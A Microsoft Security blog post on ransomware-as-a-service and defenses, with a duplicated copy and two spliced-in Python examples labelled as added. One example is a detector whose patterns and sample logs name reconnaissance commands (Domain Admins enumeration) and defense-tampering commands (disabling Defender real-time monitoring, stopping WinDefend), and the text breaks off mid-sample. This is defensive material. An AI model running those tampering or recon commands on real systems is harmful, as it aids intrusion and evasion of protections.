Too often, a legacy configuration ensures that a mission-critical application works by giving it the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can read.
In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can\u2019t be used to move laterally. Run services as Network Service when accessing other resources.\n * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.\n * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn\u2019t be exposed on member servers or workstations.\n * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. 
Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.\n * Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.\n * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities\n\n### Auditing credential exposure\n\nAuditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.\n\nMicrosoft has observed ransomware attackers also using BloodHound in attacks. 
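The two monitoring steps in the credential hygiene list above (EventID 4624 logons of privileged accounts with logon type 2, 4, 5, or 10, and EventID 4625 failures after removing accounts from privileged groups) can be turned into a check over exported Security events. What follows is an added example and not code from the Microsoft post: it runs over constructed sample records, and the privileged account list, hostnames, and account names are assumptions. The field names (TargetDomainName, TargetUserName, LogonType) are the EventData fields of the real 4624/4625 events, which a Windows Event Forwarding or SIEM export normally preserves.

```python
"""Flag privileged-account logons that leave credentials exposed on a host,
and count failed logons per account after a privileged-group cleanup.

Added example (not from the Microsoft post). Works over dict records shaped
like the EventData of Security events 4624 and 4625.
"""
from collections import Counter
from typing import Iterable, List, NamedTuple, Set

# Logon types after which reusable credential material remains on the host:
# 2 interactive, 4 batch (scheduled task), 5 service, 10 RemoteInteractive (RDP).
# Type 3 (network) is deliberately absent: it does not cache credentials locally.
EXPOSING_LOGON_TYPES = {2, 4, 5, 10}

# Constructed placeholder set; in a real run, populate it from the membership
# of Domain Admins, Enterprise Admins, and equivalent groups.
PRIVILEGED_ACCOUNTS = {"CORP\\da-admin", "CORP\\svc-backup"}

# Constructed sample records (hostnames and accounts are made up).
SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "WS01.corp.local", "TargetDomainName": "CORP",
     "TargetUserName": "da-admin", "LogonType": "10"},   # RDP by a DA: exposed
    {"EventID": 4624, "Computer": "FS01.corp.local", "TargetDomainName": "CORP",
     "TargetUserName": "da-admin", "LogonType": "3"},    # network logon: not cached
    {"EventID": 4624, "Computer": "APP02.corp.local", "TargetDomainName": "CORP",
     "TargetUserName": "svc-backup", "LogonType": "5"},  # service logon: LSA Secrets
    {"EventID": 4624, "Computer": "WS07.corp.local", "TargetDomainName": "CORP",
     "TargetUserName": "jdoe", "LogonType": "2"},        # ordinary user: ignored
    {"EventID": 4625, "Computer": "APP02.corp.local", "TargetDomainName": "CORP",
     "TargetUserName": "svc-backup", "LogonType": "5"},  # failures after group cleanup
    {"EventID": 4625, "Computer": "APP02.corp.local", "TargetDomainName": "CORP",
     "TargetUserName": "svc-backup", "LogonType": "5"},
    {"EventID": 4625, "Computer": "WS07.corp.local", "TargetDomainName": "CORP",
     "TargetUserName": "jdoe", "LogonType": "2"},
]


class Exposure(NamedTuple):
    host: str
    account: str
    logon_type: int


def account_name(event: dict) -> str:
    """DOMAIN\\user form, matching how PRIVILEGED_ACCOUNTS is written."""
    return f"{event.get('TargetDomainName', '')}\\{event.get('TargetUserName', '')}"


def find_exposed_privileged_logons(events: Iterable[dict],
                                   privileged: Set[str]) -> List[Exposure]:
    """Distinct (host, account, logon type) triples where a privileged account
    logged on with a type that leaves credentials cached on that host."""
    found: Set[Exposure] = set()
    for ev in events:
        if int(ev.get("EventID", 0)) != 4624:
            continue
        try:
            logon_type = int(ev.get("LogonType", -1))
        except (TypeError, ValueError):
            continue  # malformed export row: skip rather than miscount
        acct = account_name(ev)
        if logon_type in EXPOSING_LOGON_TYPES and acct in privileged:
            found.add(Exposure(str(ev.get("Computer", "?")), acct, logon_type))
    return sorted(found)


def failed_logons_by_account(events: Iterable[dict]) -> Counter:
    """Count 4625 failures per account. A jump for an account you just removed
    from a privileged group points at a service or task still using it."""
    return Counter(account_name(ev) for ev in events
                   if int(ev.get("EventID", 0)) == 4625)


if __name__ == "__main__":
    for exp in find_exposed_privileged_logons(SAMPLE_EVENTS, PRIVILEGED_ACCOUNTS):
        print(f"EXPOSED {exp.account} on {exp.host} (logon type {exp.logon_type})")
    for acct, n in failed_logons_by_account(SAMPLE_EVENTS).most_common():
        print(f"FAILED  {acct}: {n} x 4625")
```

On the sample data, the network logon (type 3) by the domain admin is not reported, while the RDP logon on the workstation and the service logon on the application server are, which is exactly the exposure the list above asks admins to look for; the 4625 counter then shows which removed account is still being used by a service.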
When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they already have access to, up to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.

### Prioritizing deployment of Active Directory updates

Security patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.

### Cloud hardening

As attackers move towards cloud resources, it’s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:

**Cloud identity hardening**

 * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:
   * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.
   * Ensure that “break glass” account passwords are stored offline and configure honey-token activity for account usage.
   * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft’s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).
   * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.
   * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).

**Multifactor authentication (MFA)**

 * Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.
 * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.
 * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.
 * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA) prompts.
 * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking “Yes” on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.
 * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).

**Cloud admins**

 * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.
 * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).

### Addressing security blind spots

In almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn’t protected by antivirus or EDR solutions.
It’s important to understand that the lack of security controls on these systems, which have access to highly privileged credentials, acts as a blind spot that allows attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.

Organizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn’t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.

For Microsoft 365 Defender customers, the following checklist eliminates security blind spots:

 * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.
 * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.
 * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.
 * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.
 * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.
 * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.
 * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.

### Reducing the attack surface

Microsoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevent hands-on-keyboard activity:

 * Common entry vectors:
   * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)
   * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)
   * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)
   * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)
   * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)
   * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)
 * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):
   * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)
   * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)
   * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)
   * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)

In addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reducing the attack surface for many human-operated ransomware attacks and other threats.

### Hardening internet-facing assets and understanding your perimeter

Organizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:

 * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.
 * Block remote IT management tools such as TeamViewer, Splashtop, Remote Manipulator System, AnyDesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment.
If these systems are used in your environment, enforce security settings where possible to implement MFA.

Ransomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched or partially patched, or because access brokers had established persistence on a previously compromised system despite it later being patched.

Some observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:

 * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)
 * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)
 * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)
 * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)
 * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)
 * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)
 * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)
 * Apache Log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)

Ransomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.

## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks

The multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.

Microsoft 365 Defender’s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&CK® Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.

[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft 365 Defender.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)

In line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we're introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.

Join our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&A.
[Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)

The post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).

Published: 2022-05-09 (record MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B, source mssecure, type blog). CVEs referenced by the post: CVE-2018-13379, CVE-2019-0604, CVE-2019-11510, CVE-2019-19781, CVE-2020-10189, CVE-2020-8243, CVE-2020-8260, CVE-2021-20016, CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900, CVE-2021-31207, CVE-2021-40444, CVE-2021-44228.

Second copy of the same post (record source mmpc, last seen 2022-05-09T16:00:24):

Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.

That depth of signal intelligence gathered from various domains—identity, email, data, and cloud—provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated “cut” from their tool’s success.

The cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there’s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.

Within this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations.
We coined the industry term “human-operated ransomware” to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target’s network.

Unlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries—for example, a security product that isn’t configured to prevent tampering or a service that’s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them—with no guarantee they’ll leave their target environment once they’ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren’t successfully evicted.

Ransomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.

All human-operated ransomware campaigns—all human-operated attacks in general, for that matter—share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization’s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.**

In this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here’s a quick table of contents:

 1. **How RaaS redefines our understanding of ransomware incidents**
    * The RaaS affiliate model explained
    * Access for sale and mercurial targeting
 2. **“Human-operated” means human decisions**
    * Exfiltration and double extortion
    * Persistent and sneaky access methods
 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**
 4. **Defending against ransomware: Moving beyond protection by detection**
    * Building credential hygiene
    * Auditing credential exposure
    * Prioritizing deployment of Active Directory updates
    * Cloud hardening
    * Addressing security blind spots
    * Reducing the attack surface
    * Hardening internet-facing assets and understanding your perimeter

## How RaaS redefines our understanding of ransomware incidents

With ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the “human-operated” aspect of these attacks—attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.

In the past, we’ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.

Reporting a ransomware incident under its payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.

We know, for example, that the underlying techniques used in human-operated ransomware campaigns haven’t changed very much over the years—attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there’s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it’s only possible on the most critical assets and segments of the network.

Without the ability to steal access to highly privileged accounts, attackers can’t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.

In the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.

### The RaaS affiliate model explained

The cybercriminal economy—a connected ecosystem of many players with different techniques, goals, and skillsets—is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker’s skills.

RaaS is an arrangement between an operator and an affiliate.
The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. 
Some advertisements for the sale of initial access specifically cite that a system isn’t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it, in order to fetch higher prices.

Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn’t manifest itself as specifically attacking the target’s network; instead, it takes the form of purchasing access from an access broker or using an existing malware infection to pivot to ransomware activities.

In some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a “jump server” to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren’t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.

## “Human-operated” means human decisions

Microsoft coined the term “human-operated ransomware” to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminating in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations they take advantage of and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks—including objectives and pre-ransom activity—evolve depending on the environment and the unique opportunities identified by the attackers.

These attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.

After the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator’s skill. Frequently, attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker’s next steps.

If there’s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with the RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker.
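The reconnaissance-then-tampering sequence described above, as an added example that is not part of the original post: a small Python detector that correlates process-creation events per host and raises a finding when several of those activity categories (privileged-user enumeration, Group Policy queries, security-tool checks, defense tampering) appear within a short window. The log line format, host and user names, the category patterns, and the 30-minute window are assumptions, and the log lines are constructed.

```python
"""Correlate hands-on-keyboard reconnaissance and tampering per host.

Added example (not from the original post). The event format is a
constructed one-line-per-process log; the patterns are a starting point,
not a complete rule set.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Category -> regexes tested against the lower-cased command line.
PATTERNS = {
    "privileged_users": [
        r'net\s+group\s+"?domain admins"?',
        r"net\s+localgroup\s+administrators",
        r"get-adgroupmember",
    ],
    "group_policy": [r"\bgpresult\b", r"get-gpo\b", r"gpupdate\s+/force"],
    "security_tools": [
        r"get-mpcomputerstatus",
        r"sc\s+query\s+\w*(defend|sense)",
        r"tasklist\b.*(msmpeng|sense)",
    ],
    "tamper": [
        r"disablerealtimemonitoring",
        r"sc\s+stop\s+(windefend|sense)",
        r"sc\s+config\s+\S+\s+start=\s*disabled",
    ],
}

# Constructed log format: <ISO timestamp> host=<name> user=<name> cmd="<command line>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd="(?P<cmd>.*)"$'
)

# Constructed sample: WS01 shows the full sequence within minutes, WS02 a
# lone routine command, WS03 two matches hours apart (outside the window).
SAMPLE_LOG = r"""
2022-05-09T10:01:00Z host=WS01 user=CORP\jdoe cmd="net group "Domain Admins" /domain"
2022-05-09T10:03:30Z host=WS01 user=CORP\jdoe cmd="gpresult /r"
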